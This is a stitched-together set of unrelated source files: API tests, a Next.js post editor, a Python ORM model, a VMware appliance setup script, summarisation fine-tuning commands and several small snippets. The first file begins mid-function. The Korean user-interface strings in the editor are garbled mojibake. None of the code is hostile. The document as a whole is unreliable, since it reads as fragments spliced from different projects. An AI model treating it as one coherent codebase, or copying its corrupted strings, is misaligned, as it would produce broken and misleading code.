    process.env.esIndex = esIndex;

    providerModel = new models.Provider();
    await providerModel.createTable();

    userModel = new models.User();
    await userModel.createTable();

    process.env.AccessTokensTable = randomString();
    accessTokenModel = new models.AccessToken();
    await accessTokenModel.createTable();

    jwtAuthToken = await createFakeJwtAuthToken({ accessTokenModel, userModel });

    esClient = await Search.es('fakehost');
});

// Each test operates on its own freshly-created provider (t.context).
test.beforeEach(async (t) => {
    t.context.testProvider = fakeProviderFactory();
    await providerModel.create(t.context.testProvider);
});

// Tear down every table and the ES index created in test.before.
test.after.always(async () => {
    await accessTokenModel.deleteTable();
    await providerModel.deleteTable();
    await userModel.deleteTable();
    await esClient.indices.delete({ index: esIndex });
});
// An invalid bearer token must be rejected with 403 before any update runs.
test('CUMULUS-912 PUT with pathParameters and with an invalid access token returns an unauthorized response', async (t) => {
    const response = await request(app)
        .put('/providers/asdf')
        .set('Accept', 'application/json')
        .set('Authorization', 'Bearer ThisIsAnInvalidAuthorizationToken')
        .expect(403);

    assertions.isInvalidAccessTokenResponse(t, response);
});

test.todo('CUMULUS-912 PUT with pathParameters and with an unauthorized user returns an unauthorized response');

// Round-trip check: a PUT update must be visible on a subsequent GET.
test('PUT updates an existing provider, and that update is returned from the API', async (t) => {
    const updateParams = {
        globalConnectionLimit: t.context.testProvider.globalConnectionLimit + 1
    };

    await request(app)
        .put(`/providers/${t.context.testProvider.id}`)
        .send(updateParams)
        .set('Accept', 'application/json')
        .set('Authorization', `Bearer ${jwtAuthToken}`)
        .expect(200);

    const { body: actualProvider } = await request(app)
        .get(`/providers/${t.context.testProvider.id}`)
        .set('Accept', 'application/json')
        .set('Authorization', `Bearer ${jwtAuthToken}`)
        .expect(200);

    // Timestamps are server-assigned, so copy them from the actual response.
    const expectedProvider = {
        ...t.context.testProvider,
        ...updateParams,
        createdAt: actualProvider.createdAt,
        updatedAt: actualProvider.updatedAt
    };

    t.deepEqual(actualProvider, expectedProvider);
});

// A missing Authorization header must both 401 and leave the record intact.
test('PUT without an Authorization header returns an Authorization Missing response and does not update an existing provider', async (t) => {
    const updatedLimit = t.context.testProvider.globalConnectionLimit + 1;

    const response = await request(app)
        .put(`/providers/${t.context.testProvider.id}`)
        .send({ globalConnectionLimit: updatedLimit })
        .set('Accept', 'application/json')
        .expect(401);

    assertions.isAuthorizationMissingResponse(t, response);

    const provider = await providerModel.get({
        id: t.context.testProvider.id
    });
    t.is(provider.globalConnectionLimit, t.context.testProvider.globalConnectionLimit);
});
|
int menu(); |
<filename>frontend/src/pages/write/beginner.tsx
import type {
GetServerSidePropsContext,
GetServerSidePropsResult,
} from 'next';
import React from 'react';
import Router from 'next/router';
import { EditorLayout } from '@components/system-design/article-editor-page/beginner';
import * as API from '@modules/api';
import { snackBar } from '@modules/ui/snack-bar';
import { authStore } from '@stores/auth';
import { configStore } from '@stores/config';
// Page props resolved server-side: the authenticated user's name.
interface Props {
    username: string;
}
// Server-side gate for the editor page: hydrate the config store from the
// request cookies and require an authenticated session; anonymous visitors
// get a 404 instead of the editor.
export async function getServerSideProps({ req, }: GetServerSidePropsContext
): Promise<GetServerSidePropsResult<Props>> {
    configStore.serverSideInject(req.cookies);

    const { data } = await API.getLogin({
        'Cookie': req.headers.cookie || '',
    });

    if (data.status !== 'DONE') {
        return { notFound: true };
    }

    return {
        props: {
            username: data.body.username
        }
    };
}
// Editor page state. `token` identifies the temp (draft) post currently
// being edited; `tempPostsCache` memoizes loaded drafts by token.
interface State {
    username: string;
    title: string;
    tags: string;
    contents: [];
    token: string;
    series: string;
    image: File | undefined;
    isAutoSave: boolean;
    isHide: boolean;
    isAd: boolean;
    isOpenArticleModal: boolean;
    tempPosts: API.GetTempPostsDataTemp[],
    tempPostsCache: {
        [token: string]: {
            title: string;
            content: string;
            tags: string;
        };
    };
}
// Beginner post editor page: binds the EditorLayout inputs to component
// state, restores drafts on mount, and publishes via the API on submit.
class Write extends React.Component<Props, State> {
    // Store-subscription keys, kept so the subscriptions can be released in
    // componentWillUnmount.
    private authUpdateKey: string;
    private configUpdateKey: string;

    constructor(props: Props) {
        super(props);
        this.state = {
            username: props.username,
            title: '',
            contents: [],
            tags: '',
            token: '',
            series: '',
            isHide: false,
            isAd: false,
            image: undefined,
            isAutoSave: configStore.state.isAutoSave,
            isOpenArticleModal: false,
            tempPosts: [],
            tempPostsCache: {
            }
        };
        // Mirror auth/config store changes into component state.
        this.authUpdateKey = authStore.subscribe((state) => {
            this.setState({
                username: state.username,
            });
        });
        this.configUpdateKey = configStore.subscribe((state) => {
            this.setState({
                isAutoSave: state.isAutoSave,
            });
        });
    }

    /* Component Method */
    componentWillUnmount() {
        configStore.unsubscribe(this.configUpdateKey);
        authStore.unsubscribe(this.authUpdateKey);
    }

    // On mount, fetch saved drafts; if any exist, surface a snack bar that
    // opens the draft-selection modal when clicked.
    async componentDidMount() {
        const { data } = await API.getTempPosts();
        if (data.body.temps.length > 0) {
            this.setState({
                tempPosts: data.body.temps
            });
            snackBar('๐ ์์ฑํ๋ ํฌ์คํธ๊ฐ ์์ผ์๋ค์!', {
                onClick: () => {
                    this.setState({
                        isOpenArticleModal: true
                    });
                }
            });
        }
    }

    // Validate title/tags, then publish the post and navigate to it.
    // onFail re-enables the submit UI when validation or the API call fails.
    async onSubmit(onFail: () => void) {
        if (!this.state.title) {
            snackBar('๐ ์ ๋ชฉ์ด ๋น์ด์์ต๋๋ค.');
            onFail();
            return;
        }
        if (!this.state.tags) {
            snackBar('๐ ํค์๋๋ฅผ ์์ฑํด์ฃผ์ธ์.');
            onFail();
            return;
        }
        try {
            const { data } = await API.postPosts({
                token: this.state.token,
                title: this.state.title,
                // Empty content blocks become explicit line breaks.
                text_md: this.state.contents.map(({ text }) => {
                    if (text) {
                        return text;
                    }
                    return '<br/>';
                }).join('\n\n'),
                image: this.state.image,
                tag: this.state.tags,
                series: this.state.series,
                is_hide: JSON.stringify(this.state.isHide),
                is_advertise: JSON.stringify(this.state.isAd),
            });
            Router.push('/[author]/[posturl]', `/@${this.state.username}/${data.body.url}`);
        } catch (e) {
            snackBar('๐ฅ ๊ธ ์์ฑ์ค ์ค๋ฅ๊ฐ ๋ฐ์ํ์ต๋๋ค.');
            onFail();
        }
    }

    // Delete a draft after user confirmation and drop it from local state.
    async onDeleteTempPost(token: string) {
        if (confirm('๐ ์ ๋ง ์์๊ธ์ ์ญ์ ํ ๊น์?')) {
            const { data } = await API.deleteTempPosts(token);
            if (data.status === 'DONE') {
                this.setState({
                    token: '',
                    tempPosts: this.state.tempPosts.filter(post =>
                        post.token !== token
                    )
                });
                snackBar('๐ ์์๊ธ์ด ์ญ์ ๋์์ต๋๋ค.');
            }
        }
    }

    // Persist the auto-save preference in the config store.
    onCheckAutoSave(checked: boolean) {
        configStore.set((state) => ({
            ...state,
            isAutoSave: checked
        }));
    }

    render() {
        return (
            <EditorLayout
                title={{
                    value: this.state.title,
                    onChange: (value: string) => this.setState({
                        title: value
                    }),
                }}
                content={{
                    value: this.state.contents,
                    onChange: (value) => {
                        // NOTE(review): leftover debug log — consider removing.
                        console.log(value);
                        this.setState({
                            contents: value
                        });
                    },
                }}
                series={{
                    value: this.state.series,
                    onChange: (value) => this.setState({
                        series: value
                    }),
                }}
                tags={{
                    value: this.state.tags,
                    onChange: (value) => this.setState({
                        tags: value
                    }),
                }}
                isHide={{
                    value: this.state.isHide,
                    onChange: (value) => this.setState({
                        isHide: value
                    })
                }}
                isAd={{
                    value: this.state.isAd,
                    onChange: (value) => this.setState({
                        isAd: value
                    })
                }}
                image={{
                    onChange: (image) => this.setState({
                        image: image
                    })
                }}
                publish={{
                    title: 'ํฌ์คํธ ๋ฐํ',
                    buttonText: '์ด๋๋ก ๋ฐํํ๊ฒ ์ต๋๋ค'
                }}
                onSubmit={this.onSubmit.bind(this)}
            />
        );
    }
}
export default Write; |
<gh_stars>1-10
/**
*
 * @createTime 10:22:38 AM
* @author Eddy
*/
package tiger.test.loop;
import javax.inject.Inject;
import javax.inject.Named;
import javax.inject.Singleton;
/**
 * Demo bean used to exercise a dependency-injection cycle (Bear -> Snake).
 *
 * @author Eddy
 */
@Named("bear")
@Singleton
public class Bear {

    @Inject
    private Snake snake;

    public void bear() {
        // Fixed: the label says "snake is not null" but the original printed
        // (snake == null), inverting the reported injection result.
        System.out.println("snake is not null: " + (snake != null));
        System.out.println("bear");
        snake.snake();
    }
}
|
import {mount, createLocalVue} from "@vue/test-utils";
import Vuex from 'vuex'
import {VueSequence} from '@/index'
import Participant from '@/components/lifeline/Participant'

// Local Vue instance with Vuex, sharing one store across the test.
const localVue = createLocalVue()
localVue.use(Vuex)
const storeConfig = VueSequence.Store()
storeConfig.state.code = 'abc'
const store = new Vuex.Store(storeConfig)

describe('select a participant', () => {
    it('For VM and HTML and store', async () => {
        // Seed layout data the Participant component reads for positioning.
        store.state.firstInvocations = {
            A: {
                top: 3
            }
        }
        const propsData = {entity: { name: 'A' }}
        let participantWrapper = mount(Participant, {store, localVue, propsData});

        // Initially unselected: neither the VM flag nor the CSS class is set.
        expect(participantWrapper.vm.selected).toBeFalsy()
        expect(participantWrapper.find('.selected').exists()).toBeFalsy()

        // First click selects: VM flag, store membership and CSS class agree.
        participantWrapper.find('.participant').trigger('click')
        expect(participantWrapper.vm.selected).toBeTruthy()
        await participantWrapper.vm.$nextTick()
        expect(store.state.selected).toContain('A')
        expect(participantWrapper.find('.selected').exists()).toBeTruthy()

        // Second click toggles the selection off again everywhere.
        participantWrapper.find('.participant').trigger('click')
        expect(participantWrapper.vm.selected).toBeFalsy()
        await participantWrapper.vm.$nextTick()
        expect(store.state.selected.includes('A')).toBeFalsy()
        expect(participantWrapper.find('.selected').exists()).toBeFalsy()
    })
})
|
<reponame>nbobrov8/laba2.20
.import --csv city.csv city
select max(length(city)) from city; |
-- Inventory table: one row per stocked item; price is stored as an integer.
CREATE TABLE items (
    id INTEGER PRIMARY KEY,
    item_name TEXT NOT NULL,
    item_description TEXT,
    item_price INTEGER NOT NULL,
    item_quantity INTEGER NOT NULL
);

-- Seed data: four sample peripherals.
INSERT INTO items (item_name, item_description, item_price, item_quantity)
VALUES ('Keyboard', 'Full-size keyboard', 80, 20),
    ('Monitor', 'Full HD monitor', 305, 8),
    ('Mouse', 'Wireless mouse', 45, 30),
    ('Headphones', 'Noise cancelling headphones', 153, 12);
from __future__ import annotations
from typing import List, Optional, Dict
import uvicore
from app1.database.tables import posts as table
from app1.models.image import Image
from app1.models.attribute import Attribute
from uvicore.support.dumper import dump, dd
from uvicore.orm import Model, ModelMetaclass, Field, BelongsTo, BelongsToMany, HasMany, MorphOne, MorphMany, MorphToMany
<EMAIL>('app1.models.post.Post')
@uvicore.model()
class Post(Model['Post'], metaclass=ModelMetaclass):
    # Earlier naming/interface experiments, kept for reference:
    #class _PostModel(Model['PostModel'], PostInterface, metaclass=ModelMetaclass):
    #class _PostModel(Model['PostModel'], metaclass=ModelMetaclass):
    #class PostModel(Model['PostModel'], ModelInterface['PostModel'], metaclass=ModelMetaclass):
    #class PostModel(Model['PostModel']):
    """App1 Posts"""

    # Database table definition
    __tableclass__ = table.Posts

    # Primary key; exposed read-only.
    id: Optional[int] = Field('id',
        primary=True,
        description='Post ID',
        sortable=False,
        searchable=True,
        read_only=True,
        properties={
            'test': 'hi'
        }
    )
    # Mapped to the `unique_slug` column.
    slug: str = Field('unique_slug',
        description='URL Friendly Post Title Slug',
        required=True,
        # properties={
        #     'stuff': 'hi',
        #     'stuff2': 'hi2',
        # }
    )
    title: str = Field('title',
        description='Post Title',
        required=True,
    )
    body: str = Field('body',
        description='Post Body',
    )
    other: str = Field('other',
        description='Post Other',
    )
    # Computed (non-column) field: value produced by the cb_results callback.
    cb: str = Field(None,
        callback='cb_results'
    )
    creator_id: int = Field('creator_id',
        description="Post Creator UserID",
        required=True,
    )
    # One-To-Many Inverse (One Post has One Creator)
    creator: Optional[User] = Field(None,
        description="Post Creator User Model",
        #relation=BelongsTo('uvicore.auth.models.user.User', 'id', 'creator_id'),
        relation=BelongsTo('uvicore.auth.models.user.User'),
    )
    owner_id: int = Field('owner_id',
        description="Post Owner UserID",
        required=True,
    )
    # One-To-Many Inverse (One Post has One Owner)
    owner: Optional[User] = Field(None,
        description="Post Owner User Model",
        #relation=BelongsTo('uvicore.auth.models.user.User', 'id', 'owner_id'),
        relation=BelongsTo('uvicore.auth.models.user.User'),
    )
    # One-To-Many (One Post has Many Comments)
    comments: Optional[List[Comment]] = Field(None,
        description="Post Comments Model",
        #has_many=('app1.models.comment.Comment', 'post_id', 'id'),
        #relation=HasMany('app1.models.comment.Comment', 'post_id', 'id'),
        relation=HasMany('app1.models.comment.Comment', foreign_key='post_id'),
        #relation=HasMany('app1.models.comment.Comment'),
    )
    # Many-To-Many via post_tags pivot table
    tags: Optional[List[Tag]] = Field(None,
        description="Post Tags",
        relation=BelongsToMany('app1.models.tag.Tag', join_tablename='post_tags', left_key='post_id', right_key='tag_id'),
    )
    # Polymorphic One-To-One image
    image: Optional[Image] = Field(None,
        description="Post Image",
        relation=MorphOne('app1.models.image.Image', polyfix='imageable')
    )
    # Polymorphic One-To-Many Attributes
    attributes: Optional[List[Attribute]] = Field(None,
        #attributes: Optional[Dict] = Field(None,
        description="Post Attributes",
        # Must be a dict for unit tests
        relation=MorphMany('app1.models.attribute.Attribute', polyfix='attributable', dict_key='key', dict_value='value')
        #relation=MorphMany('app1.models.attribute.Attribute', polyfix='attributable')
    )
    # Polymorphic Many-To-Many Hashtags
    hashtags: Optional[List[str]] = Field(None,
        description="Post Hashtags",
        # relation=MorphToMany(
        #     model='app1.models.hashtag.Hashtag',
        #     join_tablename='hashtaggables',
        #     polyfix='hashtaggable',
        #     right_key='hashtag_id'
        # ),
        relation=MorphToMany(
            model='app1.models.hashtag.Hashtag',
            join_tablename='hashtaggables',
            polyfix='hashtaggable',
            right_key='hashtag_id',
            #dict_key='id',
            #dict_value='name',
            #list_value='name',
        ),
    )

    def cb_results(self):
        """Callback backing the `cb` field: the slug plus a marker suffix."""
        return str(self.slug) + ' callback'

    async def _before_save(self):
        """Model hook invoked just before a save; delegates to the parent hook."""
        await super()._before_save()
        #dump('yyyyyyyyyyyyyyyyyyyyyyyyyyyyy')
        #if self.other is not None:
        #self.other = self.other + ' !!!!!!!!!!!!!!!!!!!'

    # Disabled event-listener experiments, kept for reference:
    # @uvicore.events.listen('app1.models.post.PostModel-BeforeSave')
    # def _event_inserting(event, payload):
    #     dump('HANDLER FOR ' + event.get('name'))
    #     #pass
    #     #dump("event inserting here")
    #     #dump(payload.model.extra1)
    #     #dump(payload)
    #     if payload.model.other is not None:
    #         payload.model.other = payload.model.other + ' !!!!!!!!!!!!!'
    #         # #dump(payload.model.other)
    #     # pass
    #     #payload.model.extra1 = 'user5 extra111'
    # # #uvicore.events.listen('app1-models-post-PostModel-events-Inserting', _event_inserting)

    # @uvicore.events.listen('app1.models.post.PostModel-AfterSave')
    # def _event_inserting(event, payload):
    #     dump('HANDLER FOR ' + event.get('name'))
# IoC Class Instance
#Post: PostModel = uvicore.ioc.make('app1.models.post.Post', PostModel)
#class Post(PostIoc, Model[PostModel], PostInterface): pass
# class Post(
# _Post,
# Model[PostModel],
# PostInterface
# ): pass
# Update forwrad refs (a work around to circular dependencies)
# If the relation has an ID foreign key on this table, use ioc.make
# If not (the reverse relation) use from xyz import abc
#from uvicore.auth.models.user import User # isort:skip
#from app1.models.user import User # isort:skip
from app1.models.comment import Comment # isort:skip
from app1.models.tag import Tag # isort:skip
from app1.models.hashtag import Hashtag # isort:skip
#from uvicore.auth.models.user import User # isort:skip
from app1.models.user import User # isort:skip
#User = uvicore.ioc.make('uvicore.auth.models.user.User')
#Comment = uvicore.ioc.make('app1.models.comment.Comment')
#Tag = uvicore.ioc.make('app1.models.tag.Tag')
Post.update_forward_refs()
#PostModel.update_forward_refs()
|
#!/bin/bash
# Copyright 2019 VMware, Inc. All rights reserved.
# SPDX-License-Identifier: BSD-2

# First-boot customization driver for the VEBA appliance: reads OVF guestinfo
# properties, then sources the numbered setup scripts in order. Runs once; the
# /root/ran_customization sentinel prevents re-runs.
set -euo pipefail

# Extract all OVF Properties
VEBA_DEBUG=$(/root/setup/getOvfProperty.py "guestinfo.debug")
HOSTNAME=$(/root/setup/getOvfProperty.py "guestinfo.hostname")
IP_ADDRESS=$(/root/setup/getOvfProperty.py "guestinfo.ipaddress")
NETMASK=$(/root/setup/getOvfProperty.py "guestinfo.netmask" | awk -F ' ' '{print $1}')
GATEWAY=$(/root/setup/getOvfProperty.py "guestinfo.gateway")
DNS_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.dns")
DNS_DOMAIN=$(/root/setup/getOvfProperty.py "guestinfo.domain")
NTP_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.ntp")
HTTP_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.http_proxy")
HTTPS_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.https_proxy")
PROXY_USERNAME=$(/root/setup/getOvfProperty.py "guestinfo.proxy_username")
PROXY_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.proxy_password")
NO_PROXY=$(/root/setup/getOvfProperty.py "guestinfo.no_proxy")
ROOT_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.root_password")
ENABLE_SSH=$(/root/setup/getOvfProperty.py "guestinfo.enable_ssh" | tr '[:upper:]' '[:lower:]')
VCENTER_SERVER=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_server")
VCENTER_USERNAME=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_username")
VCENTER_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_password")
VCENTER_USERNAME_FOR_VEBA_UI=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_veba_ui_username")
VCENTER_PASSWORD_FOR_VEBA_UI=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_veba_ui_password")
VCENTER_DISABLE_TLS=$(/root/setup/getOvfProperty.py "guestinfo.vcenter_disable_tls_verification" | tr '[:upper:]' '[:lower:]')
EVENT_PROCESSOR_TYPE=$(/root/setup/getOvfProperty.py "guestinfo.event_processor_type")
OPENFAAS_PASSWORD=$(/root/setup/getOvfProperty.py "guestinfo.openfaas_password")
OPENFAAS_ADV_OPTION=$(/root/setup/getOvfProperty.py "guestinfo.openfaas_advanced_options")
KNATIVE_HOST=$(/root/setup/getOvfProperty.py "guestinfo.knative_host")
# BUG FIX: quote the tr character classes; unquoted [:upper:] / [:lower:] are
# globs and would be expanded if a matching file existed in the cwd.
KNATIVE_SCHEME=$(/root/setup/getOvfProperty.py "guestinfo.knative_scheme" | tr '[:upper:]' '[:lower:]')
KNATIVE_DISABLE_TLS=$(/root/setup/getOvfProperty.py "guestinfo.knative_disable_tls_verification" | tr '[:upper:]' '[:lower:]')
KNATIVE_PATH=$(/root/setup/getOvfProperty.py "guestinfo.knative_path")
AWS_EVENTBRIDGE_ACCESS_KEY=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_access_key")
AWS_EVENTBRIDGE_ACCESS_SECRET=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_access_secret")
AWS_EVENTBRIDGE_EVENT_BUS=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_event_bus")
AWS_EVENTBRIDGE_REGION=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_region")
AWS_EVENTBRIDGE_RULE_ARN=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_arn")
AWS_EVENTBRIDGE_ADV_OPTION=$(/root/setup/getOvfProperty.py "guestinfo.aws_eb_advanced_options")
CUSTOM_VEBA_TLS_PRIVATE_KEY=$(/root/setup/getOvfProperty.py "guestinfo.custom_tls_private_key")
CUSTOM_VEBA_TLS_CA_CERT=$(/root/setup/getOvfProperty.py "guestinfo.custom_tls_ca_cert")
DOCKER_NETWORK_CIDR=$(/root/setup/getOvfProperty.py "guestinfo.docker_network_cidr")
POD_NETWORK_CIDR=$(/root/setup/getOvfProperty.py "guestinfo.pod_network_cidr")
LOCAL_STORAGE_DISK="/dev/sdb"
# NOTE(review): "STOARGE" is a typo, but the name may be referenced by the
# sourced setup-* scripts — do not rename without checking them.
LOCAL_STOARGE_VOLUME_PATH="/data"

export KUBECONFIG="/root/.kube/config"

if [ -e /root/ran_customization ]; then
    exit
else
    VEBA_LOG_FILE=/var/log/bootstrap.log
    # BUG FIX: quote the expansion — with an empty VEBA_DEBUG the unquoted
    # form collapses to `[ == "True" ]`, which is a test syntax error.
    if [ "${VEBA_DEBUG}" == "True" ]; then
        VEBA_LOG_FILE=/var/log/bootstrap-debug.log
        set -x
        exec 2>> ${VEBA_LOG_FILE}
        echo
        echo "### WARNING -- DEBUG LOG CONTAINS ALL EXECUTED COMMANDS WHICH INCLUDES CREDENTIALS -- WARNING ###"
        echo "### WARNING -- PLEASE REMOVE CREDENTIALS BEFORE SHARING LOG -- WARNING ###"
        echo
    fi

    # Determine Knative deployment model
    if [ "${EVENT_PROCESSOR_TYPE}" == "Knative" ]; then
        # BUG FIX: quote and use -n; `[ ! -z ${KNATIVE_HOST} ]` misbehaves
        # when the value is empty or contains whitespace.
        if [ -n "${KNATIVE_HOST}" ]; then
            KNATIVE_DEPLOYMENT_TYPE="external"
        else
            KNATIVE_DEPLOYMENT_TYPE="embedded"
        fi
    else
        KNATIVE_DEPLOYMENT_TYPE="na"
    fi

    echo -e "\e[92mStarting Customization ..." > /dev/console

    echo -e "\e[92mStarting OS Configuration ..." > /dev/console
    . /root/setup/setup-01-os.sh

    echo -e "\e[92mStarting Network Proxy Configuration ..." > /dev/console
    . /root/setup/setup-02-proxy.sh

    echo -e "\e[92mStarting Network Configuration ..." > /dev/console
    . /root/setup/setup-03-network.sh

    echo -e "\e[92mStarting Kubernetes Configuration ..." > /dev/console
    . /root/setup/setup-04-kubernetes.sh

    if [ "${KNATIVE_DEPLOYMENT_TYPE}" == "embedded" ]; then
        echo -e "\e[92mStarting Knative Configuration ..." > /dev/console
        . /root/setup/setup-05-knative.sh
    fi

    echo -e "\e[92mStarting VMware Event Processor Configuration ..." > /dev/console
    . /root/setup/setup-06-event-processor.sh

    echo -e "\e[92mStarting VMware Event Router Configuration ..." > /dev/console
    . /root/setup/setup-07-event-router.sh

    echo -e "\e[92mStarting TinyWWW Configuration ..." > /dev/console
    . /root/setup/setup-08-tinywww.sh

    echo -e "\e[92mStarting Ingress Router Configuration ..." > /dev/console
    . /root/setup/setup-09-ingress.sh

    # The VEBA UI is only deployed for embedded Knative when both vCenter
    # credentials for the UI were supplied.
    if [[ "${KNATIVE_DEPLOYMENT_TYPE}" == "embedded" ]] && [[ -n "${VCENTER_USERNAME_FOR_VEBA_UI}" ]] && [[ -n "${VCENTER_PASSWORD_FOR_VEBA_UI}" ]]; then
        echo -e "\e[92mStarting Knative UI Configuration ..." > /dev/console
        . /root/setup/setup-010-veba-ui.sh
    fi

    echo -e "\e[92mStarting OS Banner Configuration ..."> /dev/console
    . /root/setup/setup-011-banner.sh &

    echo -e "\e[92mCustomization Completed ..." > /dev/console

    # Clear guestinfo.ovfEnv
    vmtoolsd --cmd "info-set guestinfo.ovfEnv NULL"

    # Ensure we don't run customization again
    touch /root/ran_customization
fi
def km_to_miles(km_h):
    """Convert a speed in kilometres per hour to miles per hour."""
    miles_per_km = 0.621371
    return km_h * miles_per_km


if __name__ == "__main__":
    print(km_to_miles(25))
<reponame>Uvacoder/sorted-colors<gh_stars>100-1000
const test = require('tape')
const loadDOM = require('../../test-helpers/load-dom')

// Fixture: the <th> ids become column keys, and each row's class attribute is
// expected to surface as that row's `type`.
const exampleTableMarkup = `
<table>
  <thead>
    <tr>
      <th id="name">Name</th>
      <th id="country">Country</th>
    </tr>
  </thead>
  <tbody>
    <tr class="north">
      <td>Siberia</td>
      <td>Russia</td>
    </tr>
    <tr class="south">
      <td>Patagonia</td>
      <td>Argentina / Chile</td>
    </tr>
    <tr class="equatorial">
      <td>Amazon</td>
      <td>Brazil</td>
    </tr>
  </tbody>
</table>
`

test('Table.parseDataFromTable', async t => {
  const dom = await loadDOM()
  const { Table } = dom.window.modules

  // Mount the markup in a detached container so a real <table> element exists.
  const container = dom.window.document.createElement('div')
  container.innerHTML = exampleTableMarkup
  const exampleTable = container.firstElementChild

  const actual = Table.parseDataFromTable(exampleTable)
  const expected = {
    columns: [
      { id: 'name', name: 'Name' },
      { id: 'country', name: 'Country' }
    ],
    rows: [
      {
        type: 'north',
        name: 'Siberia',
        country: 'Russia'
      },
      {
        type: 'south',
        name: 'Patagonia',
        country: 'Argentina / Chile'
      },
      {
        type: 'equatorial',
        name: 'Amazon',
        country: 'Brazil'
      }
    ]
  }

  t.deepLooseEqual(actual, expected, 'Parsed correctly')
})
|
# Fine-tune mBART-50 on the Turkish split of MLSUM (8 GPUs, 1 node).
# Effective batch size = 2 * 8 accum * 8 GPUs = 128.
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
    --model_name_or_path "facebook/mbart-large-50" \
    --do_eval \
    --do_train \
    --do_predict \
    --dataset_name mlsum \
    --dataset_config "tu" \
    --output_dir ./eval-tr-bart-large/ \
    --per_device_train_batch_size 2 \
    --per_device_eval_batch_size 4 \
    --gradient_accumulation_steps 4 \
    --predict_with_generate \
    --evaluation_strategy epoch \
    --save_strategy epoch \
    --num_beams 4 \
    --source_lang tr_TR \
    --target_lang tr_TR \
    --forced_bos_token tr_TR \
    --max_target_length 64 \
    --max_source_length 496 \
    --num_train_epochs 10 \
    --load_best_model_at_end \
    --metric_for_best_model eval_rougeL \
    --learning_rate 5e-05 \
    --group_by_length \
    --report_to tensorboard \
    --label_smoothing_factor 0.1 \
    --fp16

# Fine-tune mT5-base on the same data. Note the higher LR (5e-4, usual for T5)
# and the "summarize: " task prefix; no fp16 (mT5 is unstable in fp16).
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
    --model_name_or_path "google/mt5-base" \
    --do_eval \
    --do_train \
    --do_predict \
    --dataset_name mlsum \
    --dataset_config "tu" \
    --output_dir ./eval-mt5-base-aggressive/ \
    --per_device_train_batch_size 2 \
    --per_device_eval_batch_size 4 \
    --gradient_accumulation_steps 4 \
    --predict_with_generate \
    --evaluation_strategy epoch \
    --save_strategy epoch \
    --num_beams 4 \
    --max_target_length 64 \
    --max_source_length 496 \
    --num_train_epochs 10 \
    --learning_rate 5e-04 \
    --load_best_model_at_end \
    --metric_for_best_model eval_rougeL \
    --group_by_length \
    --report_to tensorboard \
    --source_prefix "summarize: " \
    --label_smoothing_factor 0.1

# Fine-tune the locally pre-trained uncased Turkish BART checkpoint; larger
# per-device batch and a longer source window (768 tokens).
python -m torch.distributed.launch --nnodes=1 --nproc_per_node=8 --node_rank=0 transformers/examples/pytorch/summarization/run_summarization.py \
    --model_name_or_path "./turkish-bart-uncased" \
    --do_eval \
    --do_train \
    --do_predict \
    --dataset_name mlsum \
    --dataset_config "tu" \
    --output_dir ./eval-turkish-bart-uncased/ \
    --per_device_train_batch_size 4 \
    --per_device_eval_batch_size 8 \
    --gradient_accumulation_steps 2 \
    --predict_with_generate \
    --evaluation_strategy epoch \
    --save_strategy epoch \
    --num_beams 4 \
    --max_target_length 64 \
    --max_source_length 768 \
    --num_train_epochs 15 \
    --learning_rate 1e-4 \
    --load_best_model_at_end \
    --metric_for_best_model eval_rougeL \
    --group_by_length \
    --report_to tensorboard \
    --label_smoothing_factor 0.1 \
    --fp16
|
#include <algorithm>
#include <iostream>
#include <numeric>
#include <string>
#include <vector>

#include "processor.h"
#include "linux_parser.h"
using std::string;
using std::vector;
// DONE: Return the aggregate CPU utilization
// DONE: Return the aggregate CPU utilization
// Returns the fraction of non-idle CPU time accumulated since the previous
// call, by differencing against the cached previous_idle/previous_total
// counters (which are updated on every call).
float Processor::Utilization() {
  vector<string> utilizationStrings = LinuxParser::CpuUtilization();
  vector<int> cpuTimes;
  std::transform(utilizationStrings.begin(), utilizationStrings.end(),
                 std::back_inserter(cpuTimes),
                 [](const std::string& str) { return std::stoi(str); });

  // Guard against a short/empty parse so cpuTimes[3] cannot read out of range.
  if (cpuTimes.size() < 4) {
    return 0.0f;
  }

  // NOTE(review): assumes index 3 of LinuxParser::CpuUtilization() is the
  // idle field (as in /proc/stat field order) — confirm against the parser.
  const int idle = cpuTimes[3];
  const int total = std::accumulate(cpuTimes.begin(), cpuTimes.end(), 0);

  auto idle_delta = (float) (idle - previous_idle);
  auto total_delta = (float) (total - previous_total);

  this->previous_idle = idle;
  this->previous_total = total;

  // BUG FIX: two calls within the same clock tick made total_delta zero and
  // returned NaN (0/0). Report zero load for a zero-length interval instead.
  if (total_delta == 0.0f) {
    return 0.0f;
  }
  return 1 - idle_delta / total_delta;
}
|
#!/usr/bin/env vbash

# Copyright (c) 2016 Paul Jolly <paul@myitcv.org.uk>, all rights reserved.
# Use of this document is governed by a license found in the LICENSE document.

# Top-level test driver: runs each nested sub-repo's run_tests.sh in a fixed
# order, then regenerates/verifies code in every Go module.
source "$(git rev-parse --show-toplevel)/_scripts/common.bash"

# TODO: work out a better way of priming the build tools
go install myitcv.io/cmd/concsh myitcv.io/cmd/pkgconcat
go install golang.org/x/tools/cmd/goimports

# Top-level run_tests.sh only.

# check we don't have doubly-nested sub tests - we don't support this yet
diff -wu <(nested_test_dirs) <(nested_test_dirs | grep -v -f <(nested_test_dir_patterns))

# TODO for now we manually specify the run order of nested test dirs
# that is until we automate the dependency order (or use Bazel??)
nested_order="sorter
immutable
cmd/gjbt
react
gopherize.me"

# TODO remove when we revert back to running tests in parallel
